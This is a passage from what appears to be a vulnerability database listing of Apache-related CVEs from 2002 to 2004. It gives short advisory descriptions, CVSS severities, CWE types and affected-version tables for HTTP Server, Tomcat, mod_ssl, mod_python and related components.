Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.19
CVE-2002-2029 HIGH

PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.19
apache http_server 1.3.11
apache http_server 1.3.12
apache http_server 1.3.14
apache http_server 1.3.13
apache http_server 1.3.20
apache http_server 1.3.17
apache http_server 1.3.18
apache http_server 1.3.15
apache http_server 1.3.16
CVE-2002-2103 MEDIUM

Apache before 1.3.24, when writing to the log file, records a spoofed hostname from the reverse lookup of an IP address, even when a double-reverse lookup fails, which allows remote attackers to hide the original source of activities.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.19
apache http_server 1.3.11
apache http_server 1.3.23
apache http_server 1.3.9
apache http_server 1.3.17
apache http_server 1.3.12
apache http_server 1.3.22
apache http_server 1.3.14
apache http_server 1.3.13
apache http_server 1.3.20
apache http_server 1.3.18
apache http_server 1.3.15
apache http_server 1.3.16
CVE-2002-2272 HIGH

Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache tomcat 4.1.2
apache http_server 1.3.19
apache tomcat 4.0.0
apache tomcat 4.1.1
apache tomcat 4.1.10
apache tomcat 4.0.4
apache tomcat 4.1.12
apache http_server 1.3.22
apache http_server 1.3.10
apache http_server 1.3.14
apache http_server 1.3.15
apache http_server 1.3.16
apache http_server 1.3.27
apache tomcat 4.0.3
apache tomcat 4.0.2
apache tomcat 4.0.6
apache http_server 1.3.11
apache http_server 1.3.23
apache http_server 1.3.24
apache http_server 1.3.25
apache http_server 1.3.1
apache tomcat 4.0.5
apache http_server 1.3.17
apache http_server 1.3.26
apache tomcat 4.0.1
apache http_server 1.3
apache tomcat 4.1.9
apache tomcat 4.1.0
apache http_server 1.3.12
apache http_server 1.3.13
apache http_server 1.3.20
apache http_server 1.3.2
apache http_server 1.3.0
apache http_server 1.3.18
apache tomcat 4.1.3
CVE-2003-0016 HIGH

Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.38
apache http_server 2.0.41
apache http_server 2.0.39
apache http_server 2.0.40
apache http_server 2.0.37
apache http_server 2.0.36
CVE-2003-0017 MEDIUM

Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.38
apache http_server 2.0.41
apache http_server 2.0.39
apache http_server 2.0.40
apache http_server 2.0.37
apache http_server 2.0.36
CVE-2003-0020 MEDIUM

Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server *
CVE-2003-0042 MEDIUM

Jakarta Tomcat before 3.3.1a, when used with JDK 1.3.1 or earlier, allows remote attackers to list directories even with an index.html or other file present, or obtain unprocessed source code for a JSP file, via a URL containing a null character.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 3.3.1
apache tomcat 3.1
apache tomcat 3.3
apache tomcat 3.1.1
apache tomcat 3.2.4
apache tomcat 3.2.1
apache tomcat 3.0
apache tomcat 3.2
apache tomcat 3.2.3
CVE-2003-0043 MEDIUM

Jakarta Tomcat before 3.3.1a, when used with JDK 1.3.1 or earlier, uses trusted privileges when processing the web.xml file, which could allow remote attackers to read portions of some files through the web.xml file.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 3.3.1
apache tomcat 3.1
apache tomcat 3.3
apache tomcat 3.1.1
apache tomcat 3.2.4
apache tomcat 3.2.1
apache tomcat 3.0
apache tomcat 3.2
apache tomcat 3.2.3
CVE-2003-0044 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in the (1) examples and (2) ROOT web applications for Jakarta Tomcat 3.x through 3.3.1a allow remote attackers to insert arbitrary web script or HTML.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 3.3.1
apache tomcat 3.1
apache tomcat 3.3
apache tomcat 3.1.1
apache tomcat 3.2.4
apache tomcat 3.2.1
apache tomcat 3.3.1a
apache tomcat 3.0
apache tomcat 3.2
apache tomcat 3.2.3
CVE-2003-0045 MEDIUM

Jakarta Tomcat before 3.3.1a on certain Windows systems may allow remote attackers to cause a denial of service (thread hang and resource consumption) via a request for a JSP page containing an MS-DOS device name, such as aux.jsp.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 3.3.1
apache tomcat 3.1
apache tomcat 3.3
apache tomcat 3.1.1
apache tomcat 3.2.4
apache tomcat 3.2.1
apache tomcat 3.0
apache tomcat 3.2
apache tomcat 3.2.3
CVE-2003-0083 MEDIUM

Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server *
CVE-2003-0132 MEDIUM

A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-772,

Products Affected

Vendor Product Version
apache http_server *
CVE-2003-0134 MEDIUM

Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.32
apache http_server 2.0.38
apache http_server 2.0.39
apache http_server 2.0.40
apache http_server 2.0.35
apache http_server 2.0.36
apache http_server 2.0
apache http_server 2.0.9
apache http_server 2.0.41
apache http_server 2.0.44
apache http_server 2.0.45
apache http_server 2.0.28
apache http_server 2.0.37
CVE-2003-0189 MEDIUM

The authentication module for Apache 2.0.40 through 2.0.45 on Unix does not properly handle threads safely when using the crypt_r or crypt functions, which allows remote attackers to cause a denial of service (failed Basic authentication with valid usernames and passwords) when a threaded MPM is used.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.41
apache http_server 2.0.40
apache http_server 2.0.44
apache http_server 2.0.45
CVE-2003-0192 MEDIUM

Apache 2 before 2.0.47, and certain versions of mod_ssl for Apache 1.3, do not properly handle "certain sequences of per-directory renegotiations and the SSLCipherSuite directive being used to upgrade from a weak ciphersuite to a strong one," which could cause Apache to use the weak ciphersuite.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.32
apache http_server 2.0.38
apache http_server 2.0.39
apache http_server 2.0.40
apache http_server 2.0.35
apache http_server 2.0.36
apache http_server 2.0.46
apache http_server 2.0
apache http_server 2.0.41
apache http_server 2.0.44
apache http_server 2.0.45
apache http_server 2.0.28
apache http_server 2.0.37
CVE-2003-0245 MEDIUM

Vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library for Apache 2.0.37 through 2.0.45 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.38
apache http_server 2.0.41
apache http_server 2.0.39
apache http_server 2.0.40
apache http_server 2.0.44
apache http_server 2.0.45
apache http_server 2.0.37
CVE-2003-0253 MEDIUM

The prefork MPM in Apache 2 before 2.0.47 does not properly handle certain errors from accept, which could lead to a denial of service.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.32
apache http_server 2.0.38
apache http_server 2.0.39
apache http_server 2.0.40
apache http_server 2.0.35
apache http_server 2.0.36
apache http_server 2.0.46
apache http_server 2.0
apache http_server 2.0.41
apache http_server 2.0.44
apache http_server 2.0.45
apache http_server 2.0.28
apache http_server 2.0.37
CVE-2003-0254 MEDIUM

Apache 2 before 2.0.47, when running on an IPv6 host, allows attackers to cause a denial of service (CPU consumption by infinite loop) when the FTP proxy server fails to create an IPv6 socket.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.32
apache http_server 2.0.38
apache http_server 2.0.39
apache http_server 2.0.40
apache http_server 2.0.35
apache http_server 2.0.36
apache http_server 2.0.46
apache http_server 2.0
apache http_server 2.0.41
apache http_server 2.0.44
apache http_server 2.0.45
apache http_server 2.0.28
apache http_server 2.0.37
CVE-2003-0460 MEDIUM

The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server *
CVE-2003-0542 HIGH

Multiple stack-based buffer overflows in (1) mod_alias and (2) mod_rewrite for Apache before 1.3.29 allow attackers to create configuration files to cause a denial of service (crash) or execute arbitrary code via a regular expression with more than 9 captures.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache http_server 1.3.19
apache http_server 2.0.39
apache http_server 1.3.4
apache http_server 2.0.36
apache http_server 2.0
apache http_server 1.3.22
apache http_server 1.3.14
apache http_server 2.0.41
apache http_server 2.0.44
apache http_server 1.3.27
apache http_server 2.0.47
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 1.3.11
apache http_server 1.3.23
apache http_server 1.3.24
apache http_server 1.3.25
apache http_server 2.0.32
apache http_server 2.0.38
apache http_server 1.3.9
apache http_server 1.3.1
apache http_server 2.0.40
apache http_server 1.3.17
apache http_server 1.3.26
apache http_server 1.3.6
apache http_server 1.3
apache http_server 2.0.35
apache http_server 2.0.46
apache http_server 1.3.12
apache http_server 1.3.28
apache http_server 1.3.20
apache http_server 2.0.45
apache http_server 1.3.18
apache http_server 2.0.28
apache http_server 2.0.37
apache http_server 1.3.3
CVE-2003-0789 HIGH

mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
CVE-2003-0866 MEDIUM

The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 4.0.0
apache tomcat 4.0.5
apache tomcat 4.0.1
apache tomcat 4.0.3
apache tomcat 4.0.2
apache tomcat 4.0.4
apache tomcat 4.0.6
CVE-2003-0973 MEDIUM

Unknown vulnerability in mod_python 3.0.x before 3.0.4, and 2.7.x before 2.7.9, allows remote attackers to cause a denial of service (httpd crash) via a certain query string.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache mod_python 2.7
apache mod_python 2.7.7
apache mod_python 3.0.1
apache mod_python 2.7.5
apache mod_python 3.0.2
apache mod_python 2.7.3
apache mod_python 2.7.6
apache mod_python 2.7.2
apache mod_python 2.7.1
apache mod_python 2.7.8
apache mod_python 3.0.3
apache mod_python 2.7.4
apache mod_python 3.0
CVE-2003-0987 HIGH

mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using a AuthNonce secret.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server *
CVE-2003-0993 HIGH

mod_access in Apache 1.3 before 1.3.30, when running big-endian 64-bit platforms, does not properly parse Allow/Deny rules using IP addresses without a netmask, which could allow remote attackers to bypass intended access restrictions.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.19
apache http_server 1.3.11
apache http_server 1.3.23
apache http_server 1.3.24
apache http_server 1.3.25
apache http_server 1.3.9
apache http_server 1.3.1
apache http_server 1.3.17
apache http_server 1.3.26
apache http_server 1.3.4
apache http_server 1.3.6
apache http_server 1.3
apache http_server 1.3.7
apache http_server 1.3.12
apache http_server 1.3.22
apache http_server 1.3.14
apache http_server 1.3.28
apache http_server 1.3.20
apache http_server 1.3.18
apache http_server 1.3.29
apache http_server 1.3.27
apache http_server 1.3.3
CVE-2003-1172 MEDIUM

Directory traversal vulnerability in the view-source sample file in Apache Software Foundation Cocoon 2.1 and 2.2 allows remote attackers to access arbitrary files via a .. (dot dot) in the filename parameter.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache cocoon 2.2
apache cocoon 2.1
apache cocoon 2.1.2
CVE-2003-1307 MEDIUM

The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.32
apache http_server 2.0.38
apache http_server 2.0.39
apache http_server 2.0.40
apache http_server 2.0.48
apache http_server 2.0.35
apache http_server 2.0.36
apache http_server 2.0.46
apache http_server 2.0
apache http_server 2.0.9
apache http_server 2.0.41
apache http_server 2.0.44
apache http_server 2.0.45
apache http_server 2.0.34
apache http_server 2.0.28
apache http_server 2.0.37
apache http_server 2.0.47
CVE-2003-1418 MEDIUM

Apache HTTP Server 1.3.22 through 1.3.27 on OpenBSD allows remote attackers to obtain sensitive information via (1) the ETag header, which reveals the inode number, or (2) multipart MIME boundary, which reveals child process IDs (PID).

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache http_server 1.3.23
apache http_server 1.3.24
apache http_server 1.3.22
apache http_server 1.3.25
apache http_server 1.3.26
apache http_server 1.3.27
CVE-2003-1580 MEDIUM

The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-189,

Products Affected

Vendor Product Version
apache http_server 2.0.44
CVE-2003-1581 LOW

The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache http_server 2.0.44
CVE-2004-0096 MEDIUM

Unknown vulnerability in mod_python 2.7.9 allows remote attackers to cause a denial of service (httpd crash) via a certain query string, a variant of CAN-2003-0973.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache mod_python 2.7.9
CVE-2004-0113 MEDIUM

Memory leak in ssl_engine_io.c for mod_ssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service (memory consumption) via plain HTTP requests to the SSL port of an SSL-enabled server.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.38
apache http_server 2.0.39
apache http_server 2.0.40
apache http_server 2.0.48
apache http_server 2.0.35
apache http_server 2.0.36
apache http_server 2.0.46
apache http_server 2.0.41
apache http_server 2.0.44
apache http_server 2.0.45
apache http_server 2.0.37
apache http_server 2.0.47
CVE-2004-0173 MEDIUM

Directory traversal vulnerability in Apache 1.3.29 and earlier, and Apache 2.0.48 and earlier, when running on Cygwin, allows remote attackers to read arbitrary files via a URL containing "..%5C" (dot dot encoded backslash) sequences.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.0
apache http_server 1.0.2
apache http_server 1.0.5
apache http_server 1.1.1
apache http_server 0.8.14
apache http_server 1.0.3
apache http_server 1.2.5
apache http_server 1.3
apache http_server 0.8.11
apache http_server 1.1
apache http_server 1.2
CVE-2004-0174 MEDIUM

Apache 1.4.x before 1.3.30, and 2.0.x before 2.0.49, when using multiple listening sockets on certain platforms, allows remote attackers to cause a denial of service (blocked new connections) via a "short-lived connection on a rarely-accessed listening socket."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-667,

Products Affected

Vendor Product Version
apache http_server *
CVE-2004-0263 MEDIUM

PHP 4.3.4 and earlier in Apache 1.x and 2.x (mod_php) can leak global variables between virtual hosts that are handled by the same Apache child process but have different settings, which could allow remote attackers to obtain sensitive information.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.19
apache http_server 1.0.2
apache http_server 1.0.5
apache http_server 1.3.4
apache http_server 2.0.36
apache http_server 1.1
apache http_server 1.3.14
apache http_server 1.1.1
apache http_server 2.0.44
apache http_server 1.3.29
apache http_server 1.3.27
apache http_server 2.0.47
apache http_server 1.3.23
apache http_server 1.3.24
apache http_server 2.0.32
apache http_server 1.3.9
apache http_server 1.3.1
apache http_server 2.0.40
apache http_server 2.0.48
apache http_server 2.0.35
apache http_server 2.0.46
apache http_server 1.3.7
apache http_server 1.3.12
apache http_server 1.3.20
ibm http_server 1.3.19
apache http_server 2.0.45
apache http_server 1.3.18
apache http_server 2.0.37
apache http_server 2.0.39
apache http_server 2.0
apache http_server 1.3.22
apache http_server 2.0.9
apache http_server 2.0.41
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 1.0
apache http_server 1.3.11
apache http_server 1.3.25
apache http_server 2.0.38
apache http_server 1.3.17
apache http_server 1.3.26
apache http_server 1.0.3
apache http_server 1.3.6
apache http_server 1.3
apache http_server 1.2
apache http_server 1.3.28
apache http_server 1.2.5
apache http_server 2.0.28
apache http_server 1.3.3
CVE-2004-0488 HIGH

Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-787,

Products Affected

Vendor Product Version
redhat enterprise_linux_server 2.0
apache http_server *
debian debian_linux 3.0
redhat enterprise_linux_workstation 2.0
CVE-2004-0492 HIGH

Heap-based buffer overflow in proxy_util.c for mod_proxy in Apache 1.3.25 to 1.3.31 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via a negative Content-Length HTTP header field, which causes a large amount of data to be copied.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
ibm http_server 1.3.26.2
apache http_server 1.3.31
apache http_server 1.3.26
sgi propack 2.4
hp webproxy 2.0
openbsd openbsd *
hp vvos 11.04
hp virtualvault 11.0.4
apache http_server 1.3.28
ibm http_server 1.3.28
hp webproxy 2.1
openbsd openbsd 3.5
apache http_server 1.3.29
openbsd openbsd 3.4
apache http_server 1.3.27
ibm http_server 1.3.26
ibm http_server 1.3.26.1
CVE-2004-0493 MEDIUM

The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
ibm http_server 2.0.42.1
ibm http_server 2.0.47
avaya s8300 r2.0.0
gentoo linux 1.4
trustix secure_linux 1.5
apache http_server 2.0.48
apache http_server 2.0.49
avaya s8700 r2.0.0
avaya converged_communications_server 2.0
ibm http_server 2.0.42
ibm http_server 2.0.42.2
trustix secure_linux 2.1
avaya s8500 r2.0.0
ibm http_server 2.0.47.1
apache http_server 2.0.47
trustix secure_linux 2.0
CVE-2004-0747 MEDIUM

Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-131,CWE-131,

Products Affected

Vendor Product Version
apache http_server *
CVE-2004-0748 MEDIUM

mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
apache http_server *
CVE-2004-0751 MEDIUM

The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault).

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
CVE-2004-0786 MEDIUM

The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
CVE-2004-0809 MEDIUM

The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
hp secure_web_server_for_tru64 5.1
apache http_server *
hp hp-ux 11.00
hp secure_web_server_for_tru64 5.8.1
turbolinux turbolinux_server 10.0
gentoo linux 1.4
redhat enterprise_linux_desktop 3.0
hp hp-ux 11.11
mandrakesoft mandrake_linux 10.0
debian debian_linux 3.0
redhat enterprise_linux 3.0
hp hp-ux 11.22
hp secure_web_server_for_tru64 5.1_a
hp secure_web_server_for_tru64 6.3.0
hp secure_web_server_for_tru64 5.0_a
turbolinux turbolinux_desktop 10.0
hp secure_web_server_for_tru64 5.9.1
hp hp-ux 11.23
turbolinux turbolinux_home *
mandrakesoft mandrake_linux 9.2
trustix secure_linux 2.1
hp secure_web_server_for_tru64 4.0_g
hp secure_web_server_for_tru64 5.9.2
hp secure_web_server_for_tru64 4.0_f
hp secure_web_server_for_tru64 5.8.2
trustix secure_linux 2.0
CVE-2004-0811 HIGH

Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.51
CVE-2004-0885 HIGH

The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.38
apache http_server 2.0.52
apache http_server 2.0.39
apache http_server 2.0.40
apache http_server 2.0.48
apache http_server 2.0.49
apache http_server 2.0.35
apache http_server 2.0.36
apache http_server 2.0.46
apache http_server 2.0.41
apache http_server 2.0.50
apache http_server 2.0.44
apache http_server 2.0.45
apache http_server 2.0.51
apache http_server 2.0.37
apache http_server 2.0.47
CVE-2004-0940 MEDIUM

Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-131,

Products Affected

Vendor Product Version
apache http_server *
suse suse_linux 9.0
hp hp-ux 11.00
suse suse_linux 9.2
slackware slackware_linux 10.0
slackware slackware_linux 9.0
suse suse_linux 8.1
trustix secure_linux 1.5
hp hp-ux 11.11
openpkg openpkg 2.1
slackware slackware_linux current
slackware slackware_linux 9.1
hp hp-ux 11.22
suse suse_linux 8.0
slackware slackware_linux 8.1
suse suse_linux 9.1
openpkg openpkg 2.2
slackware slackware_linux 8.0
suse suse_linux 8.2
openpkg openpkg 2.0
hp hp-ux 11.20
CVE-2004-0942 MEDIUM

Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server *
CVE-2004-1082 HIGH

mod_digest_apple for Apache 1.3.31 and 1.3.32 on Mac OS X Server does not properly verify the nonce of a client response, which allows remote attackers to replay credentials.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.19
openbsd openbsd current
hp virtualvault 4.6
avaya network_routing *
apache http_server 1.3.4
avaya modular_messaging_message_storage_server 2.0
hp virtualvault 4.7
avaya communication_manager 1.1
avaya communication_manager 1.3.1
apache http_server 1.3.22
apache http_server 1.3.14
sun sunos 5.8
apache http_server 1.3.29
openbsd openbsd 3.4
apache http_server 1.3.27
avaya communication_manager 2.0.1
sun solaris 9.0
apple apache_mod_digest_apple *
apache http_server 1.3.11
apache http_server 1.3.23
apache http_server 1.3.24
apache http_server 1.3.25
apache http_server 1.3.9
apache http_server 1.3.1
avaya mn100 *
hp webproxy a.02.10
apache http_server 1.3.17
apache http_server 1.3.26
hp webproxy a.02.00
apache http_server 1.3.6
apache http_server 1.3
sco openserver 5.0.7
sco openserver 5.0.6
apache http_server 1.3.7
apache http_server 1.3.12
apache http_server 1.3.28
apache http_server 1.3.20
ibm http_server 1.3.19
openbsd openbsd 3.5
apache http_server 1.3.18
avaya modular_messaging_message_storage_server 1.1
sun solaris 8.0
avaya communication_manager 2.0
avaya intuity_audix_lx *
hp virtualvault 4.5
apache http_server 1.3.3
CVE-2004-1387 LOW

The check_forensic script in apache-utils package 1.3.31 allows local users to overwrite or create arbitrary files via a symlink attack on temporary files.

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.31
CVE-2004-1575 MEDIUM

The XML parser in Xerces-C++ 2.5.0 allows remote attackers to cause a denial of service (CPU consumption) via XML attributes in a crafted XML document.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache xerces-c++ 2.5.0
CVE-2004-1834 LOW

mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information.

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.32
apache http_server 2.0.38
apache http_server 2.0.39
apache http_server 2.0.40
apache http_server 2.0.48
apache http_server 2.0.49
apache http_server 2.0.35
apache http_server 2.0.36
apache http_server 2.0.46
apache http_server 2.0
apache http_server 2.0.9
apache http_server 2.0.41
apache http_server 2.0.44
apache http_server 2.0.45
apache http_server 2.0.28
apache http_server 2.0.37
apache http_server 2.0.47
CVE-2004-2343 HIGH

